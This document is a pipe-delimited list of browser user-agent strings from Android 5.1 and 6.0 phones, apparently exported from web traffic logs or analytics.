| Mozilla/5.0 (Linux; Android 5.1.1; MotoG3 Build/LPI23.72-65) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-E700M Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-G531BT Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-G531H Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-J120H Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.5 Chrome/38.0.2125.102 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-J120M Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.5 Chrome/38.0.2125.102 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-J200BT Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.5 Chrome/38.0.2125.102 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-J320M Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.5 Chrome/38.0.2125.102 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-J700M Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-G531BT Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-G531BT Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.68 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-G531BT Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-G531BT Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-G531H Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-G531H Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.68 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-G531H Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-G531H Build/LMY48B; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 [FB_IAB/MESSENGER;FBAV/103.0.0.12.69;] | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-J105B Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-J105M Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-J120H Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-J120H Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-J120H Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/56.0.2924.87 Mobile Safari/537.36 [FB_IAB/MESSENGER;FBAV/103.0.0.12.69;] | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-J200BT Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-J200BT Build/LMY47X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/46.0.2490.76 Mobile Safari/537.36 [FB_IAB/MESSENGER;FBAV/101.0.0.18.337;] | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-J200M Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-J320M Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-J320M Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-J320M Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-J320M Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-J320M Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 [FB_IAB/MESSENGER;FBAV/103.0.0.12.69;] | |
| Mozilla/5.0 (Linux; Android 5.1.1; SM-J700M Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; 4017F Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; 8050E Build/LMY47I; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; ASUS_Z00VD Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; ASUS_Z00YD Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; DASH_X_PLUS_LTE Build/LMY47D) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; Lenovo A7010a48 Build/LMY47D) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; MotoE2 Build/LPCS23.13-56-5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; MotoE2 Build/LPCS23.13-56-5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; MotoE2 Build/LPCS23.13-56-5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; MS60 Build/LMY47D) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; pt-br; 5016J Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/50.0.2661.86 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; S420 Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; S420 Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.68 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; XT1022 Build/LPCS23.13-34.8-3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; XT1025 Build/LPCS23.13-34.8-3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LPBS23.13-56-2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; XT1033 Build/LPB23.13-56) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; XT1033 Build/LPBS23.13-56-2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; XT1033 Build/LPBS23.13-56-2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; XT1033 Build/LPBS23.13-56-2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; XT1033 Build/LPBS23.13-56-2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.119 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; XT1033 Build/LPBS23.13-56-2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; XT1040 Build/LPBS23.13-35.5-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1; XT1058 Build/LPAS23.12-21.7-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; ASUS_Z00LD Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; ASUS_Z00UD Build/MMB29P; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/50.0.2661.86 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; D5833 Build/23.5.A.1.291) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; D5833 Build/23.5.A.1.291) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; D6543 Build/23.5.A.1.291) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; D6643 Build/23.5.A.1.291) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; E2363 Build/26.3.B.1.33) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; Lenovo K33b36 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; Lenovo K53b36 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; Lenovo K53b36 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; LG-H840 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; LG-K200 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.119 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-50) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-50) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; Moto G Play Build/MPIS24.241-15.3-7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; Moto G Play Build/MPIS24.241-15.3-7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-A500M Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G935F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-A500M Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.81 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-A500M Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-A510M Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-A510M Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-A710M Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-G532MT Build/MMB29T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.98 Mobile Safari/537.36 SamsungBrowser/CrossApp/0.1.89 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-G532MT Build/MMB29T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 SamsungBrowser/CrossApp/0.1.89 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-G600FY Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-G610M Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/51.0.2704.81 Mobile Safari/537.36 SamsungBrowser/CrossApp/0.1.87 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-G610M Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 SamsungBrowser/CrossApp/0.1.87 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-G610M Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 SamsungBrowser/CrossApp/0.1.90 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-G800H Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.68 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-G800H Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-G900M Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-G900M Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-G903M Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-G903M Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-G920I Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 SamsungBrowser/CrossApp/0.1.88 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-G925I Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 SamsungBrowser/CrossApp/0.1.88 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-G928G Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 SamsungBrowser/CrossApp/0.1.88 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-G928G Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-G930F Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 SamsungBrowser/CrossApp/0.1.88 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-G930F Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/56.0.2924.87 Mobile Safari/537.36 SamsungBrowser/CrossApp/0.1.88 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-G935F Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 SamsungBrowser/CrossApp/0.1.88 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-J500M Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-J500M Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/51.0.2704.81 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-J500M Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.98 Mobile Safari/537.36 SamsungBrowser/CrossApp/0.1.88 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-J500M Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.124 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-J500M Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/54.0.2840.85 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-J500M Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 [FB_IAB/MESSENGER;FBAV/103.0.0.12.69;] | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-J500M Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 SamsungBrowser/CrossApp/0.1.88 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-J500M Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-J500M Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/56.0.2924.78 Mobile Safari/537.36 SamsungBrowser/CrossApp/0.1.88 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-J500M Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/56.0.2924.87 Mobile Safari/537.36 SamsungBrowser/CrossApp/0.1.88 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-J510MN Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-J510MN Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-J700M Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.98 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-J700M Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.124 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-J700M Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 [FB_IAB/MESSENGER;FBAV/103.0.0.12.69;] | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-J700M Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-J700M Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-J710MN Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/50.0.2661.86 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-J710MN Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/54.0.2840.85 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-J710MN Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; SM-N910C Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; XT1563 Build/MPDS24.107-52-5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; XT1563 Build/MPDS24.107-52-5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; XT1563 Build/MPDS24.107-52-5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0.1; XT1635-02 Build/MPNS24.104-44-16) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 OPR/42.2.2246.112987 | |
| Mozilla/5.0 (Linux; Android 6.0.1; XT1635-02 Build/MPNS24.104-44-16) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; 4034E Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; 5010E Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; ASUS_X008DB Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; Dash L2 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016b30 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; Lenovo K10a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; Lenovo K10a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; LG-H818 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; LG-K350 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; LG-K350 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; LG-K430 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; LG-K430 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; LG-K430 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 [FB_IAB/MESSENGER;FBAV/103.0.0.12.69;] | |
| Mozilla/5.0 (Linux; Android 6.0; LG-K430 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; MotoE2(4G-LTE) Build/MPI24.65-39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; MotoE2(4G-LTE) Build/MPI24.65-39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; MotoE2(4G-LTE) Build/MPI24.65-39-4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; MotoG3 Build/MPI24.65-25.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; MotoG3 Build/MPI24.65-33.1-2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; MotoG3 Build/MPIS24.65-33.1-2-4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.94 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; MotoG3 Build/MPIS24.65-33.1-2-4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; MotoG3 Build/MPIS24.65-33.1-2-4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
